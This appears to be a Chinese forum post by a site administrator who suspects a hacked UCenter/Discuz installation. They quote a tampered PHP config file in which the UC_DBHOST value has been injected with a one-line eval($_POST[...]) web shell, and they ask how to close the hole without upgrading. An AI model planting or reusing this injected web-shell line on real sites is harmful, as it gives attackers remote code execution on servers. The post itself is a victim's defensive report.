怀疑被种马, 恢复了以前的congfig文件后可以登陆了!
新congfig文件里面多了这些东西:
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '\\\');eval($_POST[sunwear]);?>');
define('UC_DBUSER', '');
define('UC_DBPW', '');
define('UC_DBNAME', '');
define('UC_DBCHARSET', '');
define('UC_DBTABLEPRE', '');
define('UC_KEY', '');
define('UC_API', '');
define('UC_CHARSET', '');
define('UC_IP', '');
define('UC_APPID', '');
define('UC_PPP', '20');
define('UC_LINK', FALSE);
第二句估计是罪魁祸首! 但这个漏洞如何堵呢?(除了升级以外) |